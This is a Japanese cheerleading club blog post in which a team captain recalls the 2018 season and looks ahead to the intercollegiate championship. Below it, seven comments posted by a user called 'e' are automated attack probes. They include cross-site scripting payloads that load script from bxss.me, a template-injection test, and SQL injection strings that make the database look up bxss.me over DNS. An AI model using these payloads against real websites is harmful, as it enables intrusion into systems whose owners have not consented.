4回ですね

4回
この数字が何を表しているかわかるでしょうか。
そうです。私5回生のさとしが今年ラム日記を書いた回数です。
はい、違います。
いや違くはないんですけどね!
4回というのは、
今年RAMSのAチーム(ALL  STARS)のキャプテンをやってきた回数です。
その度、大会直前にラム日記を書いております。
思えばアジア大会、
昨年までチームを引張てきた上級生の多くが抜け、
全くの新しい船出だなと感じたのを覚えています。
その新しい航海の船長を任されたのが自分でした。
右も左もわからないまま、チームのみんなに支えられ、
アジア大会では両日共に全上げ、そして180点を叩き出すことができました。
関東大会はRAMS初のシード獲得に挑み、
皆で思考錯誤しながら演技を磨いていったことが懐かしいです。
「目標に対する、真摯な姿勢」
が一歩足りず、総合9位で8位までのシード獲得を逃したことは悔しかったな。
JAPAN cupはまさしく
「挑戦」
でした。
どうすればRAMSが決勝進出できるのか。
演技構成、完成度、同調性、チーム力。
本当にいろんな視点で、決勝に向けてトライしていきました。
結果、準決勝で202.5点。
RAMS初のJAPAN cup 決勝進出。
今まで目指してきた場所へ
初めて辿り着けたのです。
あと一回の練習を経て、
今年最後の全国大会であるインカレがやってきます。
ここまで、
しんどかった日も、悔しかった日も、泣いた日もありました。
でも皆んなと練習してきた日々は間違いなく自分たちの力になるはずです。
本番の2分30秒
この瞬間のために、俺らは全てをかけてきました。
その2分30秒は、
きっと最高に楽しくて、幸せで、充実した瞬間になります。
そのために俺らはやってきたんだから。
全力で楽しもうぜ😄
さて、インカレをどんな大会にするか。
「感謝」
を伝える大会にしたいと思っています。
一緒にここまでやってきたASのみんなへ、
お互い高め合ってきたレッド、ホワイトのみんなへ、
俺にチアの楽しさを教えてくれた、そして一緒に目標に向かって歩んだ先輩方へ、
コーチ、親友、家族。支えてきていださった多くの方々へ。
チアを全力で楽しむ姿を見せることが、
最高の恩返しだと思っています
さて、最後はここまで2018年RAMSを引っ張ってきた我らがキャプテンなつみに任せます!
最後にびしっと締めちゃって!

コメントをお書きください

コメント: 7
  • #1

    e (火曜日, 25 12月 2018 16:17)

    ${9999840+9999432}

  • #2

    e (火曜日, 25 12月 2018 16:17)

    http://hit7Ni7rDmKLC.bxss.me/

  • #3

    e (火曜日, 25 12月 2018 16:18)

    </script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=024065&r=3549-21&h=3549-6bd4d-2&/).slice(2),document.documentElement.appendChild(s))//'>

  • #4

    e (火曜日, 25 12月 2018 16:19)

    1'"()&%<acx><ScRiPt >ErqI(9991)</ScRiPt>

  • #5

    e (火曜日, 25 12月 2018 16:21)

    1

  • #6

    e (火曜日, 25 12月 2018 16:21)

    1||UTL_INADDR.get_host_address('dns.'||'sqli.024065.3549-96.3549.6bd4d.1.bxss'||'.me')

  • #7

    e (火曜日, 25 12月 2018 16:22)

    1';copy (select '') to program 'nslookup dns.sqli.\024065.3549-110.3549.6bd4d.\1.bxss.me